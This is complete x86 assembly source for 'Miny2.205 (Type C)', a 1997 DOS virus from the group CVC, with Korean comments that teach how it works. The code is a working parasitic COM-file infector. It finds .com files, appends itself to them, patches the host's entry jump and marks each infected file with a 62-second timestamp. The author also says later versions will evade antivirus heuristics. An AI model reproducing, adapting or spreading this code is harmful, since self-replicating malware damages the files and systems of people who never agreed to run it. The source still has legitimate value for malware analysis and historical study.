;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
;                                                               CVC #02  97/09
; Virus Name : Miny2.205 (Type C)
; Author : Osiris
; Group : CVC
; Date : 1997/08/17
;
; Type : Non-resident COM infector
;
; Miny2 (Type B) 의 개선판이다.
; COM 확장자를 가진 EXE 파일을 감염 시키지 않는다.
; 방법은 EXE 파일은 첫부분이 MZ 를 가지므로 해당파일이 MZ 로 시작하면 감염시
; 키지 않는다. 그외 64 KB 이상의 길이를 가지는 파일도 감염 시키지 않는다.
; COM 파일은 하나의 세그먼트만 존재하기 때문에 64 KB 이상의 파일은 존재 할 수
; 없다.
;
; EXE 파일은 COM 파일과는 파일구조가 틀리기 때문에 감염시키기 위해서는 또
; 다른 방법이 필요하다. 그런데 일부 EXE 파일은 COM 확장자를 가진 경우가 있다.
; (예:COMMAND.COM)
; 많은 바이러스들이 윈도우 95에서 작동을 제대로 못하는 이유중 하나가 COMMAND.
; COM 을 COM 형식으로 감염시켜서 파일 구조를 깨버리는 때문이다.
;
; 역시 많은 AV 들에게 진단이 된다. 하지만, Miny2 의 목적은 비상주 기생형 바이러
; 스 제작법이기 때문에 아직은 진단을 피하기 위한 방법을 사용하지 않았다.
; Type D 부터 TBAV 의 인공지능을 피하는 바이러스를 제작하겠다.
;
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
            .MODEL  TINY
            .CODE

 Miny2:     nop                         ; 쓰레기값 (아무일도 안한다.)
            nop                         ; 앞부분 복구시 바이러스가 파괴되기
            nop                         ; 때문에 이 값을 넣었다.
 start:
            call  Next                  ;
 Next:      pop   bp                    ;
            sub   bp,offset Next        ; BP = 바이러스 시작지점

            lea   si,COM_head[BP]       ;
            mov   di,100h               ; COM 의 앞부분을 복구한다.
            push  di                    ;
            movsw                       ;
            movsb                       ;

            mov   cx,0080h              ; DTA 로 사용해 PSP 가 파괴되므로
            mov   si,0080h              ; 잠시 저장한다.
            lea   di,End_Virus[BP]      ;
            repz  movsb                 ;

            mov   ah,4Eh                ; 파일 찾기
            mov   cx,00100011B
            lea   dx,Match_COM[BP]
 Find:      int   21h
            jnc   ChkInfected           ;
 Restart:
            lea   si,End_Virus[BP]      ; 원래 DTA 복구
            mov   di,0080h
            mov   cx,0080h
            repz  movsb
            RET

 ChkInfected:                           ; 감염 여부를 확인한다.
            mov   al,DS:[0096h]         ; 62 초 인지 검사한다.
            and   al,1Fh
            cmp   al,1Fh
            jnz   Infect
            mov   ah,4Fh                ; 다음 파일 찾기
            jmp   Find
 Infect:
            mov   ax,4301h              ; 읽기/쓰기 속성으로 바꿈
            xor   cx,cx
            mov   dx,009Eh
            int   21h
            jc    Restart               ; 에러시 파일 닫기

            mov   ax,3D02h              ; 파일 오픈
            int   21h
            jc    Restart               ; 혹시 모를 오픈시 에러도 처리했다.

            xchg  ax,bx                 ; 파일 핸들 얻기

            mov   ax,5700h              ; 파일 작성 시간 얻기
            int   21h
            push  cx                    ; 작성 시간 저장
            push  dx                    ;

            mov   ah,3Fh                ; 앞부분 읽기
            lea   dx,COM_Head[BP]       ; 버퍼 주소
            mov   cx,0003               ; 3 바이트
            int   21h
            cmp   byte ptr COM_Head[BP],'M' ; MZ 인가 ?
            jnz   lseek2                ; TBAV 에 진단안되기 위해서 따로 검사
            cmp   byte ptr COM_Head[BP+1],'Z' ; 한다.
            jz    Error
 lseek2:
            mov   al,02                 ; 파일 끝으로 이동
            call  lseek
            or    dx,dx                 ; 64 KB 이상인가 ?
            jnz   Error                 ; 다음 검사때 오픈 시키지 않기위해서

            sub   ax,3                  ; 점프값 계산
            mov   word ptr JumpCode[BP+1],ax     ;

            mov   ah,40h                ; 바이러스 쓰기
            mov   cx,offset End_virus - 3 - 2
            lea   dx,start[BP]
            int   21h

            mov   al,00                 ; 처음으로 이동
            call  lseek

            mov   ah,40h                ; 점프 코드 쓰기
            mov   cx,0003
            lea   dx,JumpCode[BP]
            int   21h

 Error:
            pop   dx                    ; 파일 작성 시간 복구
            pop   cx                    ;
            or    cx,+1Fh               ; 62 초로 만들기
            mov   ax,5701h              ;
            int   21h

 Close:
            mov   ah,3Eh                ; 파일 닫기
            int   21h
            jmp   Restart

 lseek:                                 ; 포인터 이동
            xor   cx,cx
            xor   dx,dx
            mov   ah,42h
            int   21h
            ret

 COM_head   db    0CDh,20h,90h          ; COM 앞부분
 Match_COM  db    '*.com',00            ; COM 파일 찾기
            db    'Miny2'               ; 미니 2
 JumpCode   db    0E9h
            db    ?,?
 End_Virus:
            END   Miny2

